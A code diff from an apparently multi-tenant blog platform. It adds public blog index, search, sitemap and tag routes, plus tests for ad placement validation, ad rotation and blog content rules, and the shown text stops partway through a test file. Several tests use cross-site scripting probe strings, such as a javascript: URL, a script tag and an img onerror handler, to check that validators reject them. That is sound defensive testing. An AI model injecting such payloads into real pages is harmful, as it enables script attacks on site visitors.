+      const bodyHtml = `<h1>${escapeHtml(tenant.tenantName)} Blog</h1>
+<div class="posts">${renderPostSummaryListHtml(tenantCode, result.items, "No posts yet.")}</div>
+${renderPaginationNavHtml(page, result.hasNextPage, `/blog/${tenantCode}`)}`;
+
+      const html = renderPublicPageShell({
+        title: settings.seoDefaultTitle ?? `${tenant.tenantName} Blog`,
+        description:
+          settings.seoDefaultDescription ??
+          `Latest posts from ${tenant.tenantName}.`,
+        canonicalUrl: `${url.origin}/blog/${tenantCode}`,
+        bodyHtml,
+        locale: tenant.defaultLocale
+      });
+
+      return new Response(html, {
+        status: 200,
+        headers: { "content-type": "text/html; charset=utf-8" }
+      });
+    });
+  } catch (error) {
+    log("error", "public_blog.index.failed", {
+      tenantCode,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    return serverErrorHtmlResponse();
+  }
+};

--- a/src/pages/blog/[tenantCode]/search.ts
+++ b/src/pages/blog/[tenantCode]/search.ts
@@ -1,0 +1,105 @@
+import type { APIRoute } from "astro";
+
+import { getDatabaseClient } from "../../../lib/database/client";
+import { withTenant } from "../../../lib/database/tenant-context";
+import { resolvePublicTenantByCode } from "../../../lib/tenant/public-tenant-resolver";
+import { escapeHtml } from "../../../lib/html/escape";
+import {
+  notFoundHtmlResponse,
+  serverErrorHtmlResponse
+} from "../../../lib/html/error-responses";
+import { log } from "../../../lib/logging/logger";
+import { searchPublicBlogContent } from "../../../modules/blog-content/application/blog-search";
+import { isLegacyTenantRouteEnabled } from "../../../modules/blog-content/application/public-route-settings";
+import {
+  renderPostSummaryListHtml,
+  renderPublicPageShell
+} from "../../../modules/blog-content/domain/public-page-rendering";
+import { decodeKeysetCursor } from "../../../modules/_shared/keyset-pagination";
+
+/**
+ * `GET /blog/{tenantCode}/search?q=` (Issue #540) — public search, reuses
+ * #539's `searchPublicBlogContent` directly (same public visibility
+ * predicate, `resourceType: "post"` since this issue has no public page
+ * detail route to link to — see README §Public routes). An empty/missing
+ * `q` renders the search form with no results rather than a 400 — this is
+ * a browsable public page, not a JSON API. Issue #564: 404s (same generic
+ * shape) when `legacyTenantRouteEnabled` is `false`.
+ */
+export const GET: APIRoute = async ({ params, url }) => {
+  const tenantCode = params.tenantCode;
+
+  if (!tenantCode) {
+    return notFoundHtmlResponse();
+  }
+
+  try {
+    const sql = getDatabaseClient();
+    const tenant = await resolvePublicTenantByCode(sql, tenantCode);
+
+    if (!tenant) {
+      return notFoundHtmlResponse();
+    }
+
+    const query = url.searchParams.get("q")?.trim() ?? "";
+    const cursorParam = url.searchParams.get("cursor");
+    const cursor = cursorParam ? decodeKeysetCursor(cursorParam) : null;
+
+    return await withTenant(sql, tenant.tenantId, async (tx) => {
+      if (!(await isLegacyTenantRouteEnabled(tx, tenant.tenantId))) {
+        return notFoundHtmlResponse();
+      }
+
+      const result =
+        query.length > 0
+          ? await searchPublicBlogContent(tx, tenant.tenantId, {
+              query,
+              resourceType: "post",
+              cursor: cursor ?? undefined
+            })
+          : { items: [], nextCursor: null };
+
+      const nextLink =
+        result.nextCursor && query.length > 0
+          ? `<a href="?q=${encodeURIComponent(query)}&cursor=${encodeURIComponent(result.nextCursor)}">Next</a>`
+          : "";
+
+      const bodyHtml = `<h1>Search ${escapeHtml(tenant.tenantName)} Blog</h1>
+<form method="get" action="/blog/${escapeHtml(tenantCode)}/search">
+  <input type="text" name="q" value="${escapeHtml(query)}" aria-label="Search" />
+  <button type="submit">Search</button>
+</form>
+<div class="posts">${
+        query.length === 0
+          ? "<p>Enter a search term above.</p>"
+          : renderPostSummaryListHtml(
+              tenantCode,
+              result.items,
+              "No results found."
+            )
+      }</div>
+<nav>${nextLink}</nav>`;
+
+      const html = renderPublicPageShell({
+        title: query
+          ? `Search: ${query} — ${tenant.tenantName} Blog`
+          : `Search — ${tenant.tenantName} Blog`,
+        description: `Search results for "${query}" on the ${tenant.tenantName} blog.`,
+        canonicalUrl: null,
+        bodyHtml,
+        locale: tenant.defaultLocale
+      });
+
+      return new Response(html, {
+        status: 200,
+        headers: { "content-type": "text/html; charset=utf-8" }
+      });
+    });
+  } catch (error) {
+    log("error", "public_blog.search.failed", {
+      tenantCode,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    return serverErrorHtmlResponse();
+  }
+};

--- a/src/pages/blog/[tenantCode]/sitemap-blog.xml.ts
+++ b/src/pages/blog/[tenantCode]/sitemap-blog.xml.ts
@@ -13,7 +13,7 @@ import { listPublicBlogPostsForFeed } from "../../../modules/blog-content/applic
 import { fetchBlogSettings } from "../../../modules/blog-content/application/blog-settings-directory";
 import { isLegacyTenantRouteEnabled } from "../../../modules/blog-content/application/public-route-settings";
 import { resolveNewsArticlePreviewImage } from "../../../modules/blog-content/application/news-article-seo-metadata";
-import { noopNewsMediaPortAdapter } from "../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../modules/news-portal/application/news-media-port-adapter";
 
 /**
  * `GET /blog/{tenantCode}/sitemap-blog.xml` (Issue #540) — sitemap
@@ -61,7 +61,7 @@ export const GET: APIRoute = async ({ params, url }) => {
         const previewImage = await resolveNewsArticlePreviewImage(
           tx,
           tenant.tenantId,
-          noopNewsMediaPortAdapter,
+          newsMediaPortAdapter,
           settings,
           post
         );

--- a/src/pages/blog/[tenantCode]/sitemap-blog.xml.ts
+++ b/src/pages/blog/[tenantCode]/sitemap-blog.xml.ts
@@ -1,0 +1,101 @@
+import type { APIRoute } from "astro";
+
+import { getDatabaseClient } from "../../../lib/database/client";
+import { withTenant } from "../../../lib/database/tenant-context";
+import { resolvePublicTenantByCode } from "../../../lib/tenant/public-tenant-resolver";
+import { escapeHtml } from "../../../lib/html/escape";
+import {
+  notFoundXmlResponse,
+  serverErrorXmlResponse
+} from "../../../lib/html/error-responses";
+import { log } from "../../../lib/logging/logger";
+import { listPublicBlogPostsForFeed } from "../../../modules/blog-content/application/public-blog-directory";
+import { fetchBlogSettings } from "../../../modules/blog-content/application/blog-settings-directory";
+import { isLegacyTenantRouteEnabled } from "../../../modules/blog-content/application/public-route-settings";
+import { resolveNewsArticlePreviewImage } from "../../../modules/blog-content/application/news-article-seo-metadata";
+import { noopNewsMediaPortAdapter } from "../../../modules/blog-content/application/news-media-port-noop-adapter";
+
+/**
+ * `GET /blog/{tenantCode}/sitemap-blog.xml` (Issue #540) — sitemap
+ * protocol 0.9, same public visibility predicate as the RSS feed/index
+ * (doc issue #540 §Sitemap Requirements: same exclusion list as RSS).
+ * Issue #543 §Settings Page adds `sitemapEnabled` — same disabled-looks-
+ * like-404 behavior as the RSS feed above. Issue #564 adds the same
+ * generic 404 when the tenant's `legacyTenantRouteEnabled` setting is
+ * `false`.
+ */
+export const GET: APIRoute = async ({ params, url }) => {
+  const tenantCode = params.tenantCode;
+
+  if (!tenantCode) {
+    return notFoundXmlResponse();
+  }
+
+  try {
+    const sql = getDatabaseClient();
+    const tenant = await resolvePublicTenantByCode(sql, tenantCode);
+
+    if (!tenant) {
+      return notFoundXmlResponse();
+    }
+
+    return await withTenant(sql, tenant.tenantId, async (tx) => {
+      if (!(await isLegacyTenantRouteEnabled(tx, tenant.tenantId))) {
+        return notFoundXmlResponse();
+      }
+
+      const settings = await fetchBlogSettings(tx, tenant.tenantId);
+
+      if (!settings.sitemapEnabled) {
+        return notFoundXmlResponse();
+      }
+
+      const posts = await listPublicBlogPostsForFeed(tx, tenant.tenantId);
+      const channelLink = `${url.origin}/blog/${tenantCode}`;
+
+      // Issue #649 — see `/news/sitemap-news.xml.ts`'s identical comment:
+      // resolved sequentially, one query at a time on the shared transaction.
+      const urlParts: string[] = [];
+      for (const post of posts) {
+        const link = `${channelLink}/${post.slug}`;
+        const previewImage = await resolveNewsArticlePreviewImage(
+          tx,
+          tenant.tenantId,
+          noopNewsMediaPortAdapter,
+          settings,
+          post
+        );
+        const imageTag = previewImage
+          ? `<image:image><image:loc>${escapeHtml(previewImage.url)}</image:loc></image:image>`
+          : "";
+
+        urlParts.push(`<url>
+<loc>${escapeHtml(link)}</loc>
+<lastmod>${post.publishedAt.toISOString()}</lastmod>
+${imageTag}
+</url>`);
+      }
+
+      const urls = urlParts.join("\n");
+
+      const xml = `<?xml version="1.0" encoding="UTF-8"?>
+<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:image="http://www.google.com/schemas/sitemap-image/1.1">
+<url>
+<loc>${escapeHtml(channelLink)}</loc>
+</url>
+${urls}
+</urlset>`;
+
+      return new Response(xml, {
+        status: 200,
+        headers: { "content-type": "application/xml; charset=utf-8" }
+      });
+    });
+  } catch (error) {
+    log("error", "public_blog.sitemap.failed", {
+      tenantCode,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    return serverErrorXmlResponse();
+  }
+};

--- a/src/pages/blog/[tenantCode]/tag/[slug].ts
+++ b/src/pages/blog/[tenantCode]/tag/[slug].ts
@@ -1,0 +1,93 @@
+import type { APIRoute } from "astro";
+
+import { getDatabaseClient } from "../../../../lib/database/client";
+import { withTenant } from "../../../../lib/database/tenant-context";
+import { resolvePublicTenantByCode } from "../../../../lib/tenant/public-tenant-resolver";
+import { escapeHtml } from "../../../../lib/html/escape";
+import {
+  notFoundHtmlResponse,
+  serverErrorHtmlResponse
+} from "../../../../lib/html/error-responses";
+import { log } from "../../../../lib/logging/logger";
+import { parsePageParam } from "../../../../modules/_shared/offset-pagination";
+import {
+  fetchPublicTermBySlug,
+  listPublicBlogPostsByTermId
+} from "../../../../modules/blog-content/application/public-blog-directory";
+import { isLegacyTenantRouteEnabled } from "../../../../modules/blog-content/application/public-route-settings";
+import {
+  renderPaginationNavHtml,
+  renderPostSummaryListHtml,
+  renderPublicPageShell
+} from "../../../../modules/blog-content/domain/public-page-rendering";
+
+/** `GET /blog/{tenantCode}/tag/{slug}` (Issue #540) — same as the category archive, scoped to `taxonomy_type = 'tag'`, including the Issue #564 `legacyTenantRouteEnabled` gate. */
+export const GET: APIRoute = async ({ params, url }) => {
+  const tenantCode = params.tenantCode;
+  const slug = params.slug;
+
+  if (!tenantCode || !slug) {
+    return notFoundHtmlResponse();
+  }
+
+  try {
+    const sql = getDatabaseClient();
+    const tenant = await resolvePublicTenantByCode(sql, tenantCode);
+
+    if (!tenant) {
+      return notFoundHtmlResponse();
+    }
+
+    const page = parsePageParam(url.searchParams.get("page"));
+
+    return await withTenant(sql, tenant.tenantId, async (tx) => {
+      if (!(await isLegacyTenantRouteEnabled(tx, tenant.tenantId))) {
+        return notFoundHtmlResponse();
+      }
+
+      const term = await fetchPublicTermBySlug(
+        tx,
+        tenant.tenantId,
+        "tag",
+        slug
+      );
+
+      if (!term) {
+        return notFoundHtmlResponse();
+      }
+
+      const result = await listPublicBlogPostsByTermId(
+        tx,
+        tenant.tenantId,
+        term.id,
+        {
+          page
+        }
+      );
+
+      const bodyHtml = `<h1>Tag: ${escapeHtml(term.name)}</h1>
+<div class="posts">${renderPostSummaryListHtml(tenantCode, result.items, "No posts with this tag yet.")}</div>
+${renderPaginationNavHtml(page, result.hasNextPage, `/blog/${tenantCode}/tag/${term.slug}`)}`;
+
+      const html = renderPublicPageShell({
+        title: `${term.name} — ${tenant.tenantName} Blog`,
+        description: term.description ?? `Posts tagged ${term.name}.`,
+        canonicalUrl: `${url.origin}/blog/${tenantCode}/tag/${term.slug}`,
+        bodyHtml,
+        locale: tenant.defaultLocale
+      });
+
+      return new Response(html, {
+        status: 200,
+        headers: { "content-type": "text/html; charset=utf-8" }
+      });
+    });
+  } catch (error) {
+    log("error", "public_blog.tag.failed", {
+      tenantCode,
+      slug,
+      error: error instanceof Error ? error.message : String(error)
+    });
+    return serverErrorHtmlResponse();
+  }
+};

--- a/tests/ad-placement-policy.test.ts
+++ b/tests/ad-placement-policy.test.ts
@@ -1,0 +1,256 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  AD_PLACEMENT_KEYS,
+  AD_PLACEMENT_PRESETS,
+  AD_ROTATION_MODES,
+  isAdPlacementKey,
+  isAdRotationMode,
+  isSafeAdLinkUrl,
+  validateCreateAdPlacementInput,
+  validateUpdateAdPlacementInput
+} from "../src/modules/news-portal/domain/ad-placement-policy";
+
+const VALID_MEDIA_ID = "11111111-1111-1111-1111-111111111111";
+
+describe("isAdPlacementKey (Issue #638)", () => {
+  test("accepts every declared placement key from the issue body", () => {
+    expect(AD_PLACEMENT_KEYS).toEqual([
+      "header_banner",
+      "below_headline",
+      "homepage_middle",
+      "homepage_bottom",
+      "article_top",
+      "article_middle",
+      "article_bottom",
+      "sidebar_top",
+      "sidebar_middle",
+      "sidebar_bottom",
+      "category_archive_top",
+      "search_result_top"
+    ]);
+
+    for (const key of AD_PLACEMENT_KEYS) {
+      expect(isAdPlacementKey(key)).toBe(true);
+    }
+  });
+
+  test("rejects unknown values", () => {
+    for (const value of ["ad_slot", "not_a_placement", 123, null, undefined]) {
+      expect(isAdPlacementKey(value)).toBe(false);
+    }
+  });
+});
+
+describe("AD_PLACEMENT_PRESETS (Issue #638)", () => {
+  test("every declared placement key has a preset with recommendedSize/allowedMediaTypes/maxItems", () => {
+    for (const key of AD_PLACEMENT_KEYS) {
+      const preset = AD_PLACEMENT_PRESETS[key];
+      expect(preset.recommendedSize.length).toBeGreaterThan(0);
+      expect(preset.allowedMediaTypes.length).toBeGreaterThan(0);
+      expect(preset.maxItems).toBeGreaterThan(0);
+      // SVG is never an allowed media type by default (Keputusan kunci #5).
+      expect(preset.allowedMediaTypes).not.toContain("image/svg+xml");
+    }
+  });
+});
+
+describe("isAdRotationMode (Issue #638)", () => {
+  test("accepts every declared rotation mode from the issue body", () => {
+    expect(AD_ROTATION_MODES).toEqual([
+      "latest",
+      "priority",
+      "random_safe",
+      "weighted"
+    ]);
+    for (const mode of AD_ROTATION_MODES) {
+      expect(isAdRotationMode(mode)).toBe(true);
+    }
+  });
+
+  test("rejects unknown values", () => {
+    for (const value of ["random", "fifo", 1, null]) {
+      expect(isAdRotationMode(value)).toBe(false);
+    }
+  });
+});
+
+describe("isSafeAdLinkUrl (Issue #638)", () => {
+  test("accepts absolute http/https URLs", () => {
+    expect(isSafeAdLinkUrl("https://example.com/promo")).toBe(true);
+    expect(isSafeAdLinkUrl("http://example.com")).toBe(true);
+  });
+
+  test("rejects javascript:/data:/relative/malformed URLs (XSS/scheme-confusion guard)", () => {
+    expect(isSafeAdLinkUrl("javascript:alert(1)")).toBe(false);
+    expect(isSafeAdLinkUrl("data:text/html,<script>alert(1)</script>")).toBe(
+      false
+    );
+    expect(isSafeAdLinkUrl("/relative/path")).toBe(false);
+    expect(isSafeAdLinkUrl("not a url")).toBe(false);
+    expect(isSafeAdLinkUrl("ftp://example.com/file")).toBe(false);
+  });
+});
+
+describe("validateCreateAdPlacementInput (Issue #638)", () => {
+  test("accepts a minimal valid input and applies defaults", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "Spring Sale",
+      mediaObjectId: VALID_MEDIA_ID
+    });
+
+    expect(result.valid).toBe(true);
+    if (!result.valid) return;
+    expect(result.value).toEqual({
+      placementKey: "header_banner",
+      name: "Spring Sale",
+      mediaObjectId: VALID_MEDIA_ID,
+      linkUrl: null,
+      rotationMode: "latest",
+      priority: 0,
+      isActive: true,
+      startsAt: null,
+      endsAt: null
+    });
+  });
+
+  test("rejects missing placementKey/name/mediaObjectId", () => {
+    const result = validateCreateAdPlacementInput({});
+    expect(result.valid).toBe(false);
+    if (result.valid) return;
+    const fields = result.errors.map((e) => e.field);
+    expect(fields).toContain("placementKey");
+    expect(fields).toContain("name");
+    expect(fields).toContain("mediaObjectId");
+  });
+
+  test("rejects a name longer than 200 characters (security-auditor Low finding, PR #727)", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "x".repeat(201),
+      mediaObjectId: VALID_MEDIA_ID
+    });
+    expect(result.valid).toBe(false);
+    if (result.valid) return;
+    expect(result.errors.some((e) => e.field === "name")).toBe(true);
+  });
+
+  test("accepts a name exactly 200 characters", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "x".repeat(200),
+      mediaObjectId: VALID_MEDIA_ID
+    });
+    expect(result.valid).toBe(true);
+  });
+
+  test("rejects a local path or arbitrary shape for mediaObjectId (must be a UUID)", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "Spring Sale",
+      mediaObjectId: "/uploads/banner.jpg"
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects an unsafe linkUrl", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "Spring Sale",
+      mediaObjectId: VALID_MEDIA_ID,
+      linkUrl: "javascript:alert(1)"
+    });
+    expect(result.valid).toBe(false);
+    if (result.valid) return;
+    expect(result.errors.map((e) => e.field)).toContain("linkUrl");
+  });
+
+  test("accepts a safe external linkUrl", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "Spring Sale",
+      mediaObjectId: VALID_MEDIA_ID,
+      linkUrl: "https://advertiser.example.com/landing"
+    });
+    expect(result.valid).toBe(true);
+    if (!result.valid) return;
+    expect(result.value.linkUrl).toBe("https://advertiser.example.com/landing");
+  });
+
+  test("rejects an unknown rotationMode", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "Spring Sale",
+      mediaObjectId: VALID_MEDIA_ID,
+      rotationMode: "round_robin"
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects a negative priority", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "Spring Sale",
+      mediaObjectId: VALID_MEDIA_ID,
+      priority: -1
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects endsAt <= startsAt", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "Spring Sale",
+      mediaObjectId: VALID_MEDIA_ID,
+      startsAt: "2026-02-01T00:00:00.000Z",
+      endsAt: "2026-01-01T00:00:00.000Z"
+    });
+    expect(result.valid).toBe(false);
+    if (result.valid) return;
+    expect(result.errors.map((e) => e.field)).toContain("endsAt");
+  });
+
+  test("accepts a valid schedule window", () => {
+    const result = validateCreateAdPlacementInput({
+      placementKey: "header_banner",
+      name: "Spring Sale",
+      mediaObjectId: VALID_MEDIA_ID,
+      startsAt: "2026-01-01T00:00:00.000Z",
+      endsAt: "2026-02-01T00:00:00.000Z"
+    });
+    expect(result.valid).toBe(true);
+  });
+});
+
+describe("validateUpdateAdPlacementInput (Issue #638)", () => {
+  test("allows placementKey to change (every preset shares the same row shape)", () => {
+    const result = validateUpdateAdPlacementInput({
+      placementKey: "sidebar_middle"
+    });
+    expect(result.valid).toBe(true);
+    if (!result.valid) return;
+    expect(result.value.placementKey).toBe("sidebar_middle");
+  });
+
+  test("allows clearing linkUrl to null", () => {
+    const result = validateUpdateAdPlacementInput({ linkUrl: null });
+    expect(result.valid).toBe(true);
+    if (!result.valid) return;
+    expect(result.value.linkUrl).toBeNull();
+  });
+
+  test("empty body is valid (no-op update)", () => {
+    const result = validateUpdateAdPlacementInput({});
+    expect(result.valid).toBe(true);
+    if (!result.valid) return;
+    expect(result.value).toEqual({});
+  });
+
+  test("rejects an unsafe linkUrl on update", () => {
+    const result = validateUpdateAdPlacementInput({
+      linkUrl: "javascript:alert(1)"
+    });
+    expect(result.valid).toBe(false);
+  });
+});

--- a/tests/ad-placement-rotation.test.ts
+++ b/tests/ad-placement-rotation.test.ts
@@ -1,0 +1,129 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  selectAdsForRotation,
+  type AdRotationCandidate
+} from "../src/modules/news-portal/domain/ad-placement-rotation";
+
+function candidate(
+  id: string,
+  priority: number,
+  createdAtMs: number
+): AdRotationCandidate {
+  return { id, priority, createdAt: new Date(createdAtMs) };
+}
+
+/** Deterministic sequence generator for tests that need a fixed `randomFn`. */
+function fixedSequence(values: readonly number[]): () => number {
+  let i = 0;
+  return () => values[i++ % values.length]!;
+}
+
+describe("selectAdsForRotation (Issue #638)", () => {
+  test("returns an empty array for an empty candidate list or maxItems <= 0", () => {
+    expect(selectAdsForRotation([], "latest", 3)).toEqual([]);
+    expect(selectAdsForRotation([candidate("a", 0, 1)], "latest", 0)).toEqual(
+      []
+    );
+    expect(selectAdsForRotation([candidate("a", 0, 1)], "latest", -1)).toEqual(
+      []
+    );
+  });
+
+  test("clamps maxItems to the candidate pool size (never pads/repeats)", () => {
+    const candidates = [candidate("a", 0, 1), candidate("b", 0, 2)];
+    expect(selectAdsForRotation(candidates, "latest", 10)).toHaveLength(2);
+  });
+
+  test('"latest" orders by createdAt descending', () => {
+    const candidates = [
+      candidate("old", 0, 1000),
+      candidate("newest", 0, 3000),
+      candidate("mid", 0, 2000)
+    ];
+    const selected = selectAdsForRotation(candidates, "latest", 2);
+    expect(selected.map((c) => c.id)).toEqual(["newest", "mid"]);
+  });
+
+  test('"priority" orders by priority descending, tie-broken by createdAt descending', () => {
+    const candidates = [
+      candidate("low", 1, 1000),
+      candidate("high", 10, 500),
+      candidate("high-newer", 10, 2000)
+    ];
+    const selected = selectAdsForRotation(candidates, "priority", 3);
+    expect(selected.map((c) => c.id)).toEqual(["high-newer", "high", "low"]);
+  });
+
+  test('"random_safe" returns every candidate exactly once when maxItems equals pool size (a permutation, not a lossy sample)', () => {
+    const candidates = [
+      candidate("a", 0, 1),
+      candidate("b", 0, 2),
+      candidate("c", 0, 3),
+      candidate("d", 0, 4)
+    ];
+    const selected = selectAdsForRotation(
+      candidates,
+      "random_safe",
+      4,
+      fixedSequence([0.9, 0.1, 0.5, 0.0])
+    );
+    expect(selected.map((c) => c.id).sort()).toEqual(["a", "b", "c", "d"]);
+  });
+
+  test('"random_safe" caps to maxItems', () => {
+    const candidates = [
+      candidate("a", 0, 1),
+      candidate("b", 0, 2),
+      candidate("c", 0, 3)
+    ];
+    const selected = selectAdsForRotation(
+      candidates,
+      "random_safe",
+      2,
+      fixedSequence([0.1, 0.2, 0.3])
+    );
+    expect(selected).toHaveLength(2);
+    // Every selected id must come from the real pool — never a fabricated one.
+    for (const item of selected) {
+      expect(["a", "b", "c"]).toContain(item.id);
+    }
+  });
+
+  test('"weighted" never selects the same candidate twice and respects maxItems', () => {
+    const candidates = [
+      candidate("a", 0, 1),
+      candidate("b", 5, 2),
+      candidate("c", 10, 3)
+    ];
+    const selected = selectAdsForRotation(
+      candidates,
+      "weighted",
+      3,
+      fixedSequence([0.01, 0.5, 0.99])
+    );
+    expect(selected).toHaveLength(3);
+    expect(new Set(selected.map((c) => c.id)).size).toBe(3);
+  });
+
+  test('"weighted" still gives a priority: 0 candidate a chance (weight = priority + 1, never zero)', () => {
+    const candidates = [candidate("zero-priority", 0, 1)];
+    // randomFn always returns 0 -- with weight priority+1=1 and only one
+    // candidate in the pool, it must still be selected (no division by zero,
+    // no permanent lockout).
+    const selected = selectAdsForRotation(candidates, "weighted", 1, () => 0);
+    expect(selected.map((c) => c.id)).toEqual(["zero-priority"]);
+  });
+
+  test("Math.random is a valid default randomFn (no crash, always returns a real subset)", () => {
+    const candidates = [
+      candidate("a", 1, 1),
+      candidate("b", 2, 2),
+      candidate("c", 3, 3)
+    ];
+    const selectedRandom = selectAdsForRotation(candidates, "random_safe", 2);
+    const selectedWeighted = selectAdsForRotation(candidates, "weighted", 2);
+    expect(selectedRandom).toHaveLength(2);
+    expect(selectedWeighted).toHaveLength(2);
+  });
+});

--- a/tests/blog-content-domain.test.ts
+++ b/tests/blog-content-domain.test.ts
@@ -1,0 +1,249 @@
+import { describe, expect, test } from "bun:test";
+
+import { validateBlogContentCore } from "../src/modules/blog-content/domain/content-validation";
+import {
+  canPurgePost,
+  canRestorePost,
+  isValidStatusTransition,
+  isBlogContentStatus,
+  isBlogContentVisibility
+} from "../src/modules/blog-content/domain/post-status";
+import {
+  isValidSlug,
+  slugify
+} from "../src/modules/blog-content/domain/slug-policy";
+import { validateSeoFields } from "../src/modules/blog-content/domain/seo-validation";
+import {
+  isTaxonomyType,
+  validateTermParent
+} from "../src/modules/blog-content/domain/taxonomy-policy";
+import { isSignificantContentChange } from "../src/modules/blog-content/domain/revision-policy";
+
+describe("validateBlogContentCore", () => {
+  test("accepts a valid core payload and trims/defaults fields", () => {
+    const result = validateBlogContentCore({
+      title: "  Hello World  ",
+      slug: "hello-world",
+      excerpt: null,
+      contentJson: { blocks: [] },
+      contentText: "Hello world body."
+    });
+
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value).toEqual({
+        title: "Hello World",
+        slug: "hello-world",
+        excerpt: null,
+        contentJson: { blocks: [] },
+        contentText: "Hello world body.",
+        locale: "id"
+      });
+    }
+  });
+
+  test("rejects a missing title and an invalid slug together", () => {
+    const result = validateBlogContentCore({
+      slug: "Not A Valid Slug!",
+      contentJson: {},
+      contentText: "body"
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      const fields = result.errors.map((error) => error.field);
+      expect(fields).toContain("title");
+      expect(fields).toContain("slug");
+    }
+  });
+
+  test("rejects a non-object contentJson", () => {
+    const result = validateBlogContentCore({
+      title: "Title",
+      slug: "title",
+      contentJson: "not-an-object",
+      contentText: "body"
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain(
+        "contentJson"
+      );
+    }
+  });
+
+  test("rejects a <script> tag in contentText", () => {
+    const result = validateBlogContentCore({
+      title: "Title",
+      slug: "title",
+      contentJson: {},
+      contentText: "<script>alert(1)</script>"
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain(
+        "contentText"
+      );
+    }
+  });
+
+  test("rejects an inline event handler embedded in contentJson", () => {
+    const result = validateBlogContentCore({
+      title: "Title",
+      slug: "title",
+      contentJson: { html: '<img src=x onerror="alert(1)">' },
+      contentText: "body"
+    });
+
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain(
+        "contentJson"
+      );
+    }
+  });
+
+  test("accepts plain contentJson/contentText with no markup", () => {
+    const result = validateBlogContentCore({
+      title: "Title",
+      slug: "title",
+      contentJson: { blocks: [{ type: "paragraph", text: "Hello" }] },
+      contentText: "Hello"
+    });
+
+    expect(result.valid).toBe(true);
+  });
+});
+
+describe("post-status", () => {
+  test("recognizes valid status/visibility values", () => {
+    expect(isBlogContentStatus("published")).toBe(true);
+    expect(isBlogContentStatus("bogus")).toBe(false);
+    expect(isBlogContentVisibility("unlisted")).toBe(true);
+    expect(isBlogContentVisibility("bogus")).toBe(false);
+  });
+
+  test("allows draft -> review -> published lifecycle transitions", () => {
+    expect(isValidStatusTransition("draft", "review")).toBe(true);
+    expect(isValidStatusTransition("review", "published")).toBe(true);
+    expect(isValidStatusTransition("published", "archived")).toBe(true);
+  });
+
+  test("rejects an archived -> published transition", () => {
+    expect(isValidStatusTransition("archived", "published")).toBe(false);
+  });
+
+  test("allows a no-op same-state transition", () => {
+    expect(isValidStatusTransition("draft", "draft")).toBe(true);
+  });
+
+  test("canRestorePost requires a non-null deletedAt", () => {
+    expect(canRestorePost(new Date())).toBe(true);
+    expect(canRestorePost(null)).toBe(false);
+  });
+
+  test("canPurgePost allows archived or soft-deleted, forbids published", () => {
+    expect(canPurgePost("archived", null)).toBe(true);
+    expect(canPurgePost("draft", new Date())).toBe(true);
+    expect(canPurgePost("published", null)).toBe(false);
+    expect(canPurgePost("draft", null)).toBe(false);
+  });
+});
+
+describe("slug-policy", () => {
+  test("accepts a well-formed slug", () => {
+    expect(isValidSlug("hello-world-2026")).toBe(true);
+  });
+
+  test("rejects uppercase, spaces, and leading/trailing hyphens", () => {
+    expect(isValidSlug("Hello World")).toBe(false);
+    expect(isValidSlug("-hello-")).toBe(false);
+    expect(isValidSlug("")).toBe(false);
+  });
+
+  test("slugify derives a valid slug from a title with punctuation and accents", () => {
+    const slug = slugify("Café: à la Mode!!");
+    expect(isValidSlug(slug)).toBe(true);
+    expect(slug).toBe("cafe-a-la-mode");
+  });
+});
+
+describe("validateSeoFields", () => {
+  test("accepts an empty payload (all fields optional)", () => {
+    const result = validateSeoFields({});
+    expect(result.valid).toBe(true);
+  });
+
+  test("rejects a seoTitle over the length limit", () => {
+    const result = validateSeoFields({ seoTitle: "x".repeat(71) });
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain("seoTitle");
+    }
+  });
+
+  test("rejects a non-absolute canonicalUrl", () => {
+    const result = validateSeoFields({ canonicalUrl: "/relative/path" });
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors.map((error) => error.field)).toContain(
+        "canonicalUrl"
+      );
+    }
+  });
+
+  test("accepts an absolute https canonicalUrl", () => {
+    const result = validateSeoFields({
+      canonicalUrl: "https://example.com/post"
+    });
+    expect(result.valid).toBe(true);
+  });
+});
+
+describe("taxonomy-policy", () => {
+  test("isTaxonomyType recognizes category and tag only", () => {
+    expect(isTaxonomyType("category")).toBe(true);
+    expect(isTaxonomyType("tag")).toBe(true);
+    expect(isTaxonomyType("bogus")).toBe(false);
+  });
+
+  test("rejects a tag with a parentId", () => {
+    const result = validateTermParent("tag", "term-1", "term-2");
+    expect(result.valid).toBe(false);
+    if (!result.valid) {
+      expect(result.errors[0]?.field).toBe("parentId");
+    }
+  });
+
+  test("allows a category with a distinct parentId", () => {
+    const result = validateTermParent("category", "term-1", "term-2");
+    expect(result.valid).toBe(true);
+  });
+
+  test("rejects a term being its own parent", () => {
+    const result = validateTermParent("category", "term-1", "term-1");
+    expect(result.valid).toBe(false);
+  });
+});
+
+describe("revision-policy", () => {
